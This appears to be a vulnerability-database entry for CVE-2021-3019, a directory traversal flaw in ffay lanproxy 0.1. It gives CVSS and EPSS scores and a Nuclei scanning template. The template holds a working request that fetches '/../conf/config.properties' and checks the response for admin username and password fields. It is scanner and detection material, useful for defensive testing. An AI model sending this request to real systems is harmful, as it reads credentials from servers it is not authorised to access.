Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2021-3019
HistoryJan 30, 2021 - 12:22 p.m.

ffay lanproxy Directory Traversal

2021-01-3012:22:35
ProjectDiscovery
github.com
4

7.5 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

NONE

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

5 Medium

CVSS2

Access Vector

NETWORK

Access Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

NONE

Availability Impact

NONE

AV:N/AC:L/Au:N/C:P/I:N/A:N

0.011 Low

EPSS

Percentile

84.4%

ffay lanproxy 0.1 is susceptible to a directory traversal vulnerability that could let attackers read /…/conf/config.properties to obtain credentials for a connection to the intranet.

id: CVE-2021-3019

info:
  name: ffay lanproxy Directory Traversal
  author: pikpikcu
  severity: high
  description: ffay lanproxy 0.1 is susceptible to a directory traversal vulnerability that could let attackers read /../conf/config.properties to obtain credentials for a connection to the intranet.
  impact: |
    This vulnerability can lead to unauthorized access to sensitive files, potential data leakage, and remote code execution.
  remediation: |
    Apply the latest patch or upgrade to a version that has fixed the vulnerability.
  reference:
    - https://github.com/ffay/lanproxy/commits/master
    - https://github.com/maybe-why-not/lanproxy/issues/1
    - https://nvd.nist.gov/vuln/detail/CVE-2021-3019
    - https://github.com/manas3c/CVE-POC
    - https://github.com/sobinge/nuclei-templates
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2021-3019
    cwe-id: CWE-22
    epss-score: 0.00832
    epss-percentile: 0.81646
    cpe: cpe:2.3:a:lanproxy_project:lanproxy:0.1:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: lanproxy_project
    product: lanproxy
  tags: cve2021,cve,lanproxy,lfi,lanproxy_project

http:
  - method: GET
    path:
      - "{{BaseURL}}/../conf/config.properties"

    matchers-condition: and
    matchers:
      - type: word
        part: header
        words:
          - "application/octet-stream"
        condition: and

      - type: word
        part: body
        words:
          - "config.admin.username"
          - "config.admin.password"
        condition: and

      - type: status
        status:
          - 200
# digest: 4b0a00483046022100823507dd00b2974bdd4f0260d6614312eb2103421df54d284e01eb0a9b14620d0221008f77848c7872a70284b767b35da931c4650b4726930dcd0501409cb1332098f1:922c64590222798bb761d5b6d8e72950

7.5 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

NONE

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

5 Medium

CVSS2

Access Vector

NETWORK

Access Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

NONE

Availability Impact

NONE

AV:N/AC:L/Au:N/C:P/I:N/A:N

0.011 Low

EPSS

Percentile

84.4%